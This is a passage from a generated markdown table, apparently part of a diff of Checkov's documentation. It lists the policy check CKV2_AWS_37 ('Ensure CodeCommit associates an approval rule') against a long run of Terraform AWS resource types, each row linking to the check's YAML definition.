[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 918 | CKV2_AWS_37 | resource | aws_lightsail_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 919 | CKV2_AWS_37 | resource | aws_lightsail_static_ip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 920 | CKV2_AWS_37 | resource | aws_lightsail_static_ip_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 921 | CKV2_AWS_37 | resource | aws_load_balancer_backend_server_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 922 | CKV2_AWS_37 | resource | aws_load_balancer_listener_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 923 | CKV2_AWS_37 | resource | aws_load_balancer_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 924 | CKV2_AWS_37 | resource | 
aws_macie_member_account_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 925 | CKV2_AWS_37 | resource | aws_macie_s3_bucket_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 926 | CKV2_AWS_37 | resource | aws_main_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 927 | CKV2_AWS_37 | resource | aws_media_convert_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 928 | CKV2_AWS_37 | resource | aws_media_package_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 929 | CKV2_AWS_37 | resource | aws_media_store_container | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 930 | CKV2_AWS_37 | resource | aws_media_store_container_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 931 | CKV2_AWS_37 | resource | aws_mq_broker | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 932 | CKV2_AWS_37 | resource | aws_mq_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 933 | CKV2_AWS_37 | resource | aws_msk_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 934 | CKV2_AWS_37 | resource | aws_msk_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 935 | CKV2_AWS_37 | resource | aws_nat_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 936 | CKV2_AWS_37 | resource | aws_neptune_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 937 | CKV2_AWS_37 | resource | aws_neptune_cluster_instance | Ensure CodeCommit associates an approval rule | 
Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 938 | CKV2_AWS_37 | resource | aws_neptune_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 939 | CKV2_AWS_37 | resource | aws_neptune_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 940 | CKV2_AWS_37 | resource | aws_neptune_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 941 | CKV2_AWS_37 | resource | aws_neptune_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 942 | CKV2_AWS_37 | resource | aws_neptune_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 943 | CKV2_AWS_37 | resource | aws_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 944 | CKV2_AWS_37 | resource | 
aws_network_acl_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 945 | CKV2_AWS_37 | resource | aws_network_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 946 | CKV2_AWS_37 | resource | aws_network_interface_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 947 | CKV2_AWS_37 | resource | aws_network_interface_sg_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 948 | CKV2_AWS_37 | resource | aws_opsworks_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 949 | CKV2_AWS_37 | resource | aws_opsworks_custom_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 950 | CKV2_AWS_37 | resource | aws_opsworks_ganglia_layer | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 951 | CKV2_AWS_37 | resource | aws_opsworks_haproxy_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 952 | CKV2_AWS_37 | resource | aws_opsworks_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 953 | CKV2_AWS_37 | resource | aws_opsworks_java_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 954 | CKV2_AWS_37 | resource | aws_opsworks_memcached_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 955 | CKV2_AWS_37 | resource | aws_opsworks_mysql_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 956 | CKV2_AWS_37 | resource | aws_opsworks_nodejs_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 957 | CKV2_AWS_37 | resource | aws_opsworks_permission | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 958 | CKV2_AWS_37 | resource | aws_opsworks_php_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 959 | CKV2_AWS_37 | resource | aws_opsworks_rails_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 960 | CKV2_AWS_37 | resource | aws_opsworks_rds_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 961 | CKV2_AWS_37 | resource | aws_opsworks_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 962 | CKV2_AWS_37 | resource | aws_opsworks_static_web_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 963 | CKV2_AWS_37 | resource | aws_opsworks_user_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 964 
| CKV2_AWS_37 | resource | aws_organizations_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 965 | CKV2_AWS_37 | resource | aws_organizations_organization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 966 | CKV2_AWS_37 | resource | aws_organizations_organizational_unit | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 967 | CKV2_AWS_37 | resource | aws_organizations_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 968 | CKV2_AWS_37 | resource | aws_organizations_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 969 | CKV2_AWS_37 | resource | aws_pinpoint_adm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 970 | CKV2_AWS_37 | resource | aws_pinpoint_apns_channel | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 971 | CKV2_AWS_37 | resource | aws_pinpoint_apns_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 972 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 973 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 974 | CKV2_AWS_37 | resource | aws_pinpoint_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 975 | CKV2_AWS_37 | resource | aws_pinpoint_baidu_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 976 | CKV2_AWS_37 | resource | aws_pinpoint_email_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 977 | CKV2_AWS_37 | resource | 
aws_pinpoint_event_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 978 | CKV2_AWS_37 | resource | aws_pinpoint_gcm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 979 | CKV2_AWS_37 | resource | aws_pinpoint_sms_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 980 | CKV2_AWS_37 | resource | aws_placement_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 981 | CKV2_AWS_37 | resource | aws_proxy_protocol_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 982 | CKV2_AWS_37 | resource | aws_qldb_ledger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 983 | CKV2_AWS_37 | resource | aws_quicksight_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 
984 | CKV2_AWS_37 | resource | aws_quicksight_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 985 | CKV2_AWS_37 | resource | aws_ram_principal_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 986 | CKV2_AWS_37 | resource | aws_ram_resource_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 987 | CKV2_AWS_37 | resource | aws_ram_resource_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 988 | CKV2_AWS_37 | resource | aws_ram_resource_share_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 989 | CKV2_AWS_37 | resource | aws_rds_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 990 | CKV2_AWS_37 | resource | aws_rds_cluster_endpoint | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 991 | CKV2_AWS_37 | resource | aws_rds_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 992 | CKV2_AWS_37 | resource | aws_rds_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 993 | CKV2_AWS_37 | resource | aws_rds_global_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 994 | CKV2_AWS_37 | resource | aws_redshift_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 995 | CKV2_AWS_37 | resource | aws_redshift_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 996 | CKV2_AWS_37 | resource | aws_redshift_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 997 | CKV2_AWS_37 | resource | aws_redshift_security_group | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 998 | CKV2_AWS_37 | resource | aws_redshift_snapshot_copy_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 999 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1000 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1001 | CKV2_AWS_37 | resource | aws_redshift_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1002 | CKV2_AWS_37 | resource | aws_resourcegroups_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1003 | CKV2_AWS_37 | resource | aws_root | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1004 | CKV2_AWS_37 | resource | aws_root_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1005 | CKV2_AWS_37 | resource | aws_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1006 | CKV2_AWS_37 | resource | aws_route53_delegation_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1007 | CKV2_AWS_37 | resource | aws_route53_health_check | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1008 | CKV2_AWS_37 | resource | aws_route53_query_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1009 | CKV2_AWS_37 | resource | aws_route53_record | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1010 | CKV2_AWS_37 | resource | aws_route53_resolver_endpoint | Ensure CodeCommit associates 
an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1011 | CKV2_AWS_37 | resource | aws_route53_resolver_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1012 | CKV2_AWS_37 | resource | aws_route53_resolver_rule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1013 | CKV2_AWS_37 | resource | aws_route53_vpc_association_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1014 | CKV2_AWS_37 | resource | aws_route53_zone | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1015 | CKV2_AWS_37 | resource | aws_route53_zone_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1016 | CKV2_AWS_37 | resource | aws_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1017 | CKV2_AWS_37 
| resource | aws_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1018 | CKV2_AWS_37 | resource | aws_s3_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1019 | CKV2_AWS_37 | resource | aws_s3_account_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1020 | CKV2_AWS_37 | resource | aws_s3_bucket | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1021 | CKV2_AWS_37 | resource | aws_s3_bucket_analytics_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1022 | CKV2_AWS_37 | resource | aws_s3_bucket_inventory | Ensure CodeCommit associates an approval rule | Terraform | 